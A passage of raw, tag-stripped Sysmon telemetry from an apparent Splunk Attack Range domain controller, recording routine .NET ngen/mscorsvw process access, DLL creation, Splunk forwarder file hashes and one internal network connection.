21:02:29.434{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A165-60D3-F302-00000000CF01}2244C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019604Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:29.434{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A165-60D3-F302-00000000CF01}2244C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000019603Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:29.404{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=61D863DA69E6D34F2CB15430191B25EC,SHA256=402406A5487DCA1FDFA7690B011885E8F2B237F20D12A49824D9302A3D0872F2,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000019619Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:02:30.995{4DB9351A-A166-60D3-F502-00000000CF01}7100C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1bbc-0\System.Drawing.dll2021-06-23 21:02:30.995 23542300x800000000000000019618Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:30.479{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=045A477B07FDEB7759815FF07C7058CC,SHA256=83BBE02E24EA5D19AB34678E05DF4A34B4EC21280864CF53037E7AE5F431DCE5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019617Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:30.479{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=79E25AB04C1C3C03DDF653E1328D82B1,SHA256=CF23A5FA1B121E89C7CDAAE04BA42F1AADA51B1CD3E7A99228F75CD65796D1E4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019616Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:30.432{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=89ED5EED419778C18B75342EDDB9BE52,SHA256=F356E21FEA56CB01A9EEF89DF078F827258CB84927A66EFB5F285F7B8515D4F1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000019615Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:30.370{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A166-60D3-F502-00000000CF01}7100C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019614Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:30.354{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A166-60D3-F502-00000000CF01}7100C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019613Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:30.354{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A166-60D3-F502-00000000CF01}7100C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000019612Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:30.135{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A166-60D3-F402-00000000CF01}5896C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019611Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:30.120{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A166-60D3-F402-00000000CF01}5896C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019610Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:30.120{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A166-60D3-F402-00000000CF01}5896C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000019609Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:30.057{4DB9351A-A165-60D3-F302-00000000CF01}2244NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\P2VW3KZBA5\System.Configuration.ni.dll.auxMD5=D6F1264D73AC502913FDB4D98ED97993,SHA256=A0AC0B3309BE4D33B8429881C33D821430FCF740347E26105DE66DB011223535,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019608Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:30.057{4DB9351A-A165-60D3-F302-00000000CF01}2244NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\P2VW3KZBA5\System.Configuration.ni.dllMD5=C0E6B8ED92D7C9595C92AE6B060A73DB,SHA256=839272E5CA71BD9FE65D5622632AF6E57A4323AF6AE61FE4A3B2BC0E29E31D0C,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000019607Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:02:30.012{4DB9351A-A165-60D3-F302-00000000CF01}2244C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\8c4-0\System.Configuration.dll2021-06-23 21:02:30.012 10341000x800000000000000019628Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:31.604{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A167-60D3-F702-00000000CF01}2228C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019627Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:31.588{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A167-60D3-F702-00000000CF01}2228C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019626Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:31.588{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A167-60D3-F702-00000000CF01}2228C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000019625Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:31.432{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C117119DE8A8B81065213F5CC641C51,SHA256=7DBC3EF1F8FE468DC25C29F2F7896D95AE6F56DB5127A200143DFFB6A57A7F14,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000019624Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:31.135{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A167-60D3-F602-00000000CF01}1040C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019623Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:31.120{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A167-60D3-F602-00000000CF01}1040C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019622Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:31.120{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A167-60D3-F602-00000000CF01}1040C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000019621Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:31.042{4DB9351A-A166-60D3-F502-00000000CF01}7100NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\BHQ5VDU9ZI\System.Drawing.ni.dll.auxMD5=C80E16AD1229B24FDB2212F630BD19B4,SHA256=5639E76749267C2CF4B60A953420C9A3E5D3471949115C7371FF9F89678EC6DE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019620Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:31.042{4DB9351A-A166-60D3-F502-00000000CF01}7100NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\BHQ5VDU9ZI\System.Drawing.ni.dllMD5=133064508CE19C63D769D27065B4C964,SHA256=3C91313089A862EEFAF2AEB2222681589B3A671598051C83F3A6DB91804EFB61,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000019631Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:32.448{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=145A21ADCA8E9F8DB3880DDA27617287,SHA256=2CC2574E7F19D5D08EA9324EC366CEB615011A04E6D99D813EED49E703173E9A,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000019630Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:30.142{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61384-false10.0.1.12-8000- 23542300x800000000000000019629Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:32.135{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=045A477B07FDEB7759815FF07C7058CC,SHA256=83BBE02E24EA5D19AB34678E05DF4A34B4EC21280864CF53037E7AE5F431DCE5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019632Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:33.448{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4536945A7BA1FBDDBB4A74D36FFF37FD,SHA256=EC95A48011BD39D06650505BC802EBAB7CAAAD96974A3B11D639C3125CD27924,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019633Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:34.479{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BB0FAB083BA02EDC115DF1F6BA31A813,SHA256=A39D73E37107EE1A6C9DCD1809FDF4301A02A64634BACDAF22F5B6D4F5F8B901,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000019646Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:35.963{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A16B-60D3-F902-00000000CF01}1688C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019645Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:35.948{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A16B-60D3-F902-00000000CF01}1688C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019644Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:35.948{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A16B-60D3-F902-00000000CF01}1688C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows